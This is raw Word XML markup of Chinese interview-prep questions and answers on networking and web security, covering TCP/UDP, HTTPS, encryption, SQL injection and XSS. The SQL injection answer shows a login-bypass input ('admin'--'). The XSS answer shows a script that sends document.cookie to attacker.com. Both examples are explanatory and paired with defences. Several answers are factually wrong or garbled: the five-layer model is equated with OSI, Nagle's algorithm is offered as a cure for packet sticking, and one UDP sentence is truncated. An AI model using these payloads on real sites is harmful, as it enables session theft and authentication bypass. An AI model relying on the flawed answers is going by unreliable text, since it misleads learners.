          <w:numId w:val="2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静态IP地址：静态IP地址是指在网络中分配给设备的固定IP地址，通常由网络管理员手动配置，并保持不变。静态IP地址可以提供更稳定和可靠的网络连接，但需要手动管理和配置。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext w:val="0"/>
        <w:keepLines w:val="0"/>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2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动态IP地址：动态IP地址是指在网络中动态分配给设备的IP地址，通常由网络服务提供商（ISP）自动分配，可以自动更新和更改。动态IP地址可以方便地管理和分配IP地址，但可能会影响网络连接的稳定性和可靠性。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext w:val="0"/>
        <w:keepLines w:val="0"/>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2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GET请求中URL编码的意义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HTTP的GET请求中，URL编码是一种将URL中特殊字符转义为%XX格式的方式。这是因为在URL中某些字符具有特殊含义，如问号、等号、&amp;符号等，如果直接将它们包含在URL中，可能会造成歧义或引起服务器解析错误。因此，需要将这些特殊字符进行编码，以便服务器正确解析和处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URL编码规则如下：</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext w:val="0"/>
        <w:keepLines w:val="0"/>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2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对于字母、数字和部分符号（如~、-、_、.等），保持原样不变。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext w:val="0"/>
        <w:keepLines w:val="0"/>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2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对于其他字符，使用%xx格式进行编码，其中xx表示字符在ASCII表中的16进制编码。例如，空格（）的ASCII码为32，因此URL编码后为%20。</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URL编码可以使用Java中的URLEncoder类进行处理。在Java中，可以使用URLEncoder.encode()方法将字符串进行URL编码。例如，对于字符串“Hello World!”，可以使用如下代码进行URL编码：</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codeString encodedString = URLEncoder.encode("Hello World!", "UTF-8");</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在以上示例中，"UTF-8"表示使用UTF-8编码格式进行URL编码。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext w:val="0"/>
        <w:keepLines w:val="0"/>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2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什么是SQL 注入？举个例子？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SQL注入是一种针对Web应用程序的攻击技术，攻击者通过在输入框或URL参数中输入恶意代码，欺骗服务器执行非法的SQL语句，从而窃取、修改或删除数据。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以下是一个SQL注入的示例：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假设一个Web应用程序具有以下查询功能：</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SELECT * FROM users WHERE username = 'input_username' AND password = 'input_password';</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其中，'input_username'和'input_password'是从用户输入的表单数据中获取的。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攻击者可以在输入框中输入如下内容：</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codeusername: admin'--</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password: 123456</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此时，服务器执行的SQL语句将会变成：</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SELECT * FROM users WHERE username = 'admin'--' AND password = '123456';</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其中，--表示SQL语句注释符号，后面的所有内容都将被忽略。这样，攻击者就可以通过SQL注入绕过用户名和密码验证，获取管理员权限。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避免SQL注入攻击，Web应用程序需要对用户输入进行严格的验证和过滤，特别是那些包含特殊字符的输入，如单引号、双引号、分号、反斜线等。最好的方法是使用预编译语句和参数化查询，这样可以有效防止SQL注入攻击。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext w:val="0"/>
        <w:keepLines w:val="0"/>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2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谈一谈 XSS 攻击，举个例子？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XSS（Cross-site Scripting）攻击是一种常见的Web安全漏洞，攻击者通过注入恶意脚本代码到网页中，利用用户对网站的信任执行恶意代码，从而达到窃取用户敏感信息或者控制用户浏览器的目的。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下面是一个XSS攻击的示例：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假设一个Web应用程序具有以下搜索功能：</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&lt;form action="/search" method="get"&gt;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&lt;input type="text" name="keywords" /&gt;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&lt;input type="submit" value="搜索" /&gt;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&lt;/form&gt;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其中，用户可以在keywords字段中输入搜索关键字，服务器会根据关键字查询数据库并返回相应的结果。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攻击者可以构造如下恶意代码：</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&lt;script&gt;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 xml:space="preserve">  window.location.href = "http://attacker.com/?cookie=" + document.cookie;</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i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:caps w:val="0"/>
          <w:color w:val="333333"/>
          <w:spacing w:val="0"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:bdr w:val="single" w:color="1ABC9C" w:sz="12" w:space="0"/>
          <w:shd w:val="clear" w:fill="F6F8FA"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="黑体" w:hAnsi="黑体" w:eastAsia="黑体" w:cs="黑体"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:caps w:val="0"/>
          <w:color w:val="333333"/>
          <w:spacing w:val="0"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:bdr w:val="single" w:color="1ABC9C" w:sz="12" w:space="0"/>
          <w:shd w:val="clear" w:fill="F6F8FA"/>
        </w:rPr>
        <w:t>&lt;/script&gt;</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="3"/>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80" w:beforeAutospacing="0" w:after="180" w:afterAutospacing="0" w:line="22" w:lineRule="atLeast"/>
        <w:ind w:left="0" w:right="0"/>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="黑体" w:hAnsi="黑体" w:eastAsia="黑体" w:cs="黑体"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pP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此时，攻击者可以将上述代码作为搜索关键字提交给服务器，服务器将恶意代码返回给客户端的浏览器，浏览器执行了这段脚本，将用户的Cookie信息发送给攻击者指定的地址。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防止XSS攻击，Web应用程序需要对用户输入进行严格的验证和过滤，特别是那些包含特殊字符的输入，如尖括号、单引号、双引号等。最好的方法是使用安全的HTML编码和过滤函数，这样可以将所有特殊字符转换为它们对应的HTML实体，从而防止恶意脚本的注入。此外，还可以使用HTTP Only标记来防止Cookie被JavaScript代码获取</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext w:val="0"/>
        <w:keepLines w:val="0"/>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2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讲一下网络五层模型，每一层的职责？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网络五层模型，也称为OSI参考模型，是国际标准化组织（ISO）为计算机网络定义的一种网络体系结构，分为以下五层：</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext w:val="0"/>
        <w:keepLines w:val="0"/>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2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物理层（Physical Layer）：负责在物理媒介上传输原始比特流（0和1）。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext w:val="0"/>
        <w:keepLines w:val="0"/>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2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数据链路层（Data Link Layer）：负责将原始比特流组装成帧，并提供数据链路的基本功能，如帧同步、流量控制、差错检测和纠错等。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext w:val="0"/>
        <w:keepLines w:val="0"/>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2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网络层（Network Layer）：负责将分组从源主机传输到目的主机，包括寻址、路由选择、拥塞控制等。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext w:val="0"/>
        <w:keepLines w:val="0"/>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2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传输层（Transport Layer）：负责提供端到端的可靠数据传输和错误控制，包括传输协议（如TCP、UDP）、流量控制、拥塞控制等。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext w:val="0"/>
        <w:keepLines w:val="0"/>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2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应用层（Application Layer）：负责为用户提供各种服务和协议，如HTTP、FTP、SMTP、DNS等。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网络五层模型将计算机网络的功能划分为不同的层次，每个层次各司其职，有利于网络系统的设计、实现和维护。同时，它还为不同厂商、不同操作系统之间的互通性提供了依据，使得不同系统之间可以进行有效的数据交换和通信。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext w:val="0"/>
        <w:keepLines w:val="0"/>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2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简单说下 HTTPS 和 HTTP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HTTP（超文本传输协议）是一种用于传输超文本数据的协议，它是客户端和服务器之间的一种无状态、无连接的请求响应协议，数据传输过程不安全。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HTTPS（超文本传输安全协议）是在HTTP的基础上加入了SSL/TLS协议来进行加密通信的协议，SSL/TLS使用非对称加密算法、对称加密算法和HASH算法来对数据进行加密传输，从而保证通信的安全性。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HTTPS和HTTP的区别主要在以下几个方面：</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext w:val="0"/>
        <w:keepLines w:val="0"/>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2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安全性：HTTPS比HTTP更安全，因为HTTPS使用SSL/TLS协议进行加密通信，可以保证传输的数据不被窃取、篡改和伪造。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext w:val="0"/>
        <w:keepLines w:val="0"/>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2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端口号：HTTP使用80端口，而HTTPS使用443端口。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext w:val="0"/>
        <w:keepLines w:val="0"/>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2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证书：HTTPS需要使用数字证书来验证服务器的身份，确保通信双方的身份真实可信。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext w:val="0"/>
        <w:keepLines w:val="0"/>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2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速度：由于HTTPS需要进行加密和解密操作，所以相比HTTP会有更大的计算负担和通信延迟，导致传输速度较慢。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综上所述，HTTP适用于无需保密的信息传输场景，如新闻网站；而HTTPS适用于对数据传输安全性要求比较高的场景，如在线支付、网银等。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext w:val="0"/>
        <w:keepLines w:val="0"/>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2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对称加密与非对称加密的区别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对称加密和非对称加密是常见的两种加密算法，它们的主要区别在于密钥的使用方式和加密方式。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对称加密使用相同的密钥对数据进行加密和解密。发送方和接收方必须拥有相同的密钥，并将密钥保密传输。常见的对称加密算法有DES、AES、RC4等。对称加密算法的优点是加密解密速度快，适用于大量数据的加密和解密，但是需要保证密钥的安全性，因为只要密钥被泄露，加密数据就可能被解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非对称加密使用一对密钥，分别是公钥和私钥。公钥用于加密数据，私钥用于解密数据。发送方需要使用接收方的公钥进行加密，接收方需要使用自己的私钥进行解密。常见的非对称加密算法有RSA、ECC、DSA等。非对称加密算法的优点是密钥不需要保密传输，但是加密解密速度较慢，适用于小量数据的加密和解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对称加密适用于大量数据的加密和解密，但是需要保证密钥的安全性；而非对称加密适用于小量数据的加密和解密，不需要保证密钥的安全性，但是加密解密速度较慢。在实际应用中，常常将对称加密和非对称加密结合使用，即使用非对称加密算法来传输对称加密算法所需的密钥，保证数据传输的安全性</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext w:val="0"/>
        <w:keepLines w:val="0"/>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="27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简单说下每一层对应的网络协议有哪些？</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext w:val="0"/>
        <w:keepLines w:val="0"/>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="27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ARP 协议的工作原理？</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext w:val="0"/>
        <w:keepLines w:val="0"/>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="27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TCP 的主要特点是什么？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TCP（Transmission Control Protocol）是一种面向连接的、可靠的传输层协议，其主要特点包括以下几个方面：</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext w:val="0"/>
        <w:keepLines w:val="0"/>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2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面向连接：TCP 在通信前需要建立连接，通信结束后需要断开连接，因此可以保证数据传输的可靠性和有序性。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext w:val="0"/>
        <w:keepLines w:val="0"/>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2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可靠性：TCP 使用序列号和确认应答机制来保证数据传输的可靠性。发送方将每个数据包标记上一个序列号，接收方接收到数据包后需要发送一个确认应答包，告诉发送方已经收到了数据包。如果发送方没有收到确认应答包，就会重新发送数据包，直到接收方确认收到为止。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext w:val="0"/>
        <w:keepLines w:val="0"/>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2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流量控制：TCP 使用滑动窗口机制来进行流量控制，即发送方发送数据的速度不能超过接收方处理数据的速度，以避免数据包丢失或者阻塞。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext w:val="0"/>
        <w:keepLines w:val="0"/>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2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拥塞控制：TCP 通过拥塞窗口机制来避免网络拥塞。当网络出现拥塞时，TCP 会根据拥塞窗口大小来调整发送数据的速度，以减少网络拥塞的程度。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext w:val="0"/>
        <w:keepLines w:val="0"/>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2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全双工通信：TCP 可以实现全双工通信，即在同一时间内可以同时进行数据的发送和接收。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总之，TCP 是一种可靠的、高效的、全双工的传输协议，适用于需要数据传输保证可靠性和有序性的场合，如文件传输、电子邮件等</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext w:val="0"/>
        <w:keepLines w:val="0"/>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="27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UDP 的主要特点是什么？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UDP（User Datagram Protocol）是一种无连接的传输层协议，其主要特点包括以下几个方面：</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext w:val="0"/>
        <w:keepLines w:val="0"/>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2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无连接：UDP 不需要在通信前建立连接，也不需要在通信结束后断开连接，因此传输速度比 TCP 更快，但可靠性较差。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext w:val="0"/>
        <w:keepLines w:val="0"/>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2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不可靠性：UDP 没有序列号和确认应答机制，数据包的传输可能会出现丢失、重复、乱序等情况。因此，应用 UDP 时需要考虑数据的可靠性问题，如增加数据冗余、采用前向纠错等措施。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext w:val="0"/>
        <w:keepLines w:val="0"/>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2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简单性：UDP 的率高。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext w:val="0"/>
        <w:keepLines w:val="0"/>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2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支持广播和多播：UDP 支持广播和多播功能，可以向多个目的地址同时发送数据。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext w:val="0"/>
        <w:keepLines w:val="0"/>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2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实时性：由于 UDP 不需要进行数据包重传和流量控制等机制，因此可以在实时应用中提供较好的性能，如视频、音频等实时流媒体传输。</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总之，UDP 是一种简单、高效、适用于实时应用的传输协议，但不适用于需要数据传输保证可靠性和有序性的场合。应用 UDP 时需要考虑数据可靠性和实时性等因素，选择合适的传输协议。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext w:val="0"/>
        <w:keepLines w:val="0"/>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="27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TCP 和 UDP 分别对应的常见应用层协议有哪些？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 和 UDP 是传输层协议，它们在应用层上可以支持不同的协议。下面是 TCP 和 UDP 常见应用层协议列表：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 协议常见应用层协议：</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext w:val="0"/>
        <w:keepLines w:val="0"/>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2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HTTP (超文本传输协议)：用于在 Web 浏览器和 Web 服务器之间传输数据，是互联网上应用最广泛的协议之一。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext w:val="0"/>
        <w:keepLines w:val="0"/>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2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FTP (文件传输协议)：用于在客户端和服务器之间传输文件。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext w:val="0"/>
        <w:keepLines w:val="0"/>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2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SMTP (简单邮件传输协议)：用于在邮件客户端和邮件服务器之间传输电子邮件。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext w:val="0"/>
        <w:keepLines w:val="0"/>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2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Telnet (远程终端协议)：用于在远程主机上执行命令。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext w:val="0"/>
        <w:keepLines w:val="0"/>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2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SSH (安全外壳协议)：用于在网络中加密传输数据，提供更安全的远程登录方式。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext w:val="0"/>
        <w:keepLines w:val="0"/>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2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POP3 (邮局协议版本3)：用于从邮件服务器上接收电子邮件。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UDP 协议常见应用层协议：</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext w:val="0"/>
        <w:keepLines w:val="0"/>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2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DNS (域名系统)：用于将域名解析为 IP 地址。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext w:val="0"/>
        <w:keepLines w:val="0"/>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2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DHCP (动态主机配置协议)：用于在网络中分配 IP 地址。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext w:val="0"/>
        <w:keepLines w:val="0"/>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2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SNMP (简单网络管理协议)：用于在网络中管理网络设备。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext w:val="0"/>
        <w:keepLines w:val="0"/>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2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TFTP (简单文件传输协议)：用于在网络上传输小型文件。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext w:val="0"/>
        <w:keepLines w:val="0"/>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2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SIP (会话初始化协议)：用于建立 VoIP (语音传输协议) 会话</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext w:val="0"/>
        <w:keepLines w:val="0"/>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2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 TIME-WAIT 状态必须等待 2MSL 的时间呢？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TIME-WAIT 状态是 TCP 协议中的一种状态，用于在关闭连接后等待一段时间以确保在网络中所有可能的重复数据包都已被丢弃。这个等待时间通常被设置为 2MSL，即两倍的最大报文段生存时间（Maximum Segment Lifetime）。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个等待时间的目的是为了确保在网络中所有的数据包都被丢弃，这样就可以避免在下一次连接中出现混淆的数据包，从而保证连接的可靠性和正确性。如果没有这个等待时间，可能会在下一次连接中出现来自之前连接的数据包，从而导致数据错误和连接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此外，MSL 的时间通常是 30 秒左右，因此等待 2MSL 的时间是为了确保足够的时间用于网络中所有数据包的处理。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext w:val="0"/>
        <w:keepLines w:val="0"/>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="28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保活计时器的作用？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保活计时器（Keep-Alive Timer）是一种用于维持TCP连接的网络协议机制，它的作用是确保TCP连接保持活跃状态，并防止连接由于长时间不活跃而被关闭。</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具体来说，当TCP连接建立后，双方会通过保活计时器来定时发送心跳包（Keep-Alive Packet），以检测对方是否仍然处于连接状态。如果一段时间内没有收到对方的响应，保活计时器会触发超时，此时TCP连接将被认为是不可用的，连接双方会尝试重新建立连接。</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保活计时器的默认超时时间通常为2个小时，这个时间可以通过系统参数进行配置。保活计时器可以在网络环境不稳定或者网络设备出现故障时起到重要的作用，确保TCP连接的可靠性和稳定性。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext w:val="0"/>
        <w:keepLines w:val="0"/>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2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TCP 协议是如何保证可靠传输的？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TCP（Transmission Control Protocol）是一种基于可靠传输的协议，它采用了以下机制来保证传输可靠性：</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext w:val="0"/>
        <w:keepLines w:val="0"/>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2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确认应答（Acknowledgment）：每次接收方收到数据包后，会向发送方发送一个确认应答，表示已经收到该数据包。如果发送方在一定时间内没有收到确认应答，则认为数据包丢失，将重新发送该数据包。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext w:val="0"/>
        <w:keepLines w:val="0"/>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2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超时重传（Timeout Retransmission）：如果发送方在一定时间内没有收到确认应答，则认为数据包丢失，将重新发送该数据包。超时时间根据网络延迟和丢包情况动态调整，以保证数据传输的效率和可靠性。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext w:val="0"/>
        <w:keepLines w:val="0"/>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2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滑动窗口（Sliding Window）：发送方和接收方都维护一个滑动窗口，用于控制发送方发送的数据量和接收方接收的数据量。发送方根据接收方的确认应答动态调整窗口大小，以避免过多的数据包丢失和重传。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext w:val="0"/>
        <w:keepLines w:val="0"/>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2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流量控制（Flow Control）：TCP还提供了流量控制机制，通过窗口大小来控制发送方发送的数据量，避免接收方无法处理太多的数据导致丢包或拥塞。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext w:val="0"/>
        <w:keepLines w:val="0"/>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2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拥塞控制（Congestion Control）：TCP还提供了拥塞控制机制，通过控制发送方的发送速率，避免网络出现拥塞情况。发送方根据网络拥塞情况动态调整发送速率，以保证网络的稳定性和可靠性。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综合以上机制，TCP可以保证数据的可靠传输和网络的稳定性，被广泛应用于互联网和局域网中。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext w:val="0"/>
        <w:keepLines w:val="0"/>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2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谈谈你对停止等待协议的理解？</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext w:val="0"/>
        <w:keepLines w:val="0"/>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2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 ARQ 协议的理解？</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext w:val="0"/>
        <w:keepLines w:val="0"/>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2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谈谈你对滑动窗口的了解？</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext w:val="0"/>
        <w:keepLines w:val="0"/>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2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谈下你对流量控制的理解？</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext w:val="0"/>
        <w:keepLines w:val="0"/>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2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谈下你对 TCP 拥塞控制的理解？使用了哪些算法？</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext w:val="0"/>
        <w:keepLines w:val="0"/>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2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什么是粘包？</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粘包是在网络通信中经常出现的一种问题，指的是多个数据包粘在一起发送或接收的情况。具体来说，发送方在一定时间内发送了多个数据包，但由于网络延迟、缓冲区大小等原因，接收方在一次接收中收到了多个数据包，这些数据包被看作一个大的数据包，形成了粘包现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造成粘包的原因主要有以下几点：</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext w:val="0"/>
        <w:keepLines w:val="0"/>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2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发送方发送多个数据包时，网络传输的延迟不同，导致接收方在同一时间内收到了多个数据包。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext w:val="0"/>
        <w:keepLines w:val="0"/>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2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发送方和接收方的缓冲区大小不同，发送方发送的数据包大小超过接收方缓冲区的大小，导致数据包被拆分成多个小的数据包传输，从而形成粘包现象。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext w:val="0"/>
        <w:keepLines w:val="0"/>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2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应用层协议的数据格式不规范，导致发送方发送的数据包没有明确的结束标识符，接收方在处理数据包时无法区分多个数据包的边界。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粘包问题可能导致接收方在处理数据时出现错误，影响通信的正确性和稳定性。为了避免粘包问题，可以采用如下措施：</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext w:val="0"/>
        <w:keepLines w:val="0"/>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2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设置合适的接收缓冲区大小，避免接收方缓冲区溢出。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext w:val="0"/>
        <w:keepLines w:val="0"/>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2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在数据包中添加长度字段，以区分不同的数据包。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext w:val="0"/>
        <w:keepLines w:val="0"/>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2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在数据包中添加结束标识符，以明确数据包的边界。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext w:val="0"/>
        <w:keepLines w:val="0"/>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2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使用专门的解决方案，如TCP协议的Nagle算法、HTTP协议的分块传输等。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext w:val="0"/>
        <w:keepLines w:val="0"/>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="28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怎么解决拆包和粘包？</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解决拆包和粘包问题的方法主要有以下几种：</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext w:val="0"/>
        <w:keepLines w:val="0"/>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="0"/>
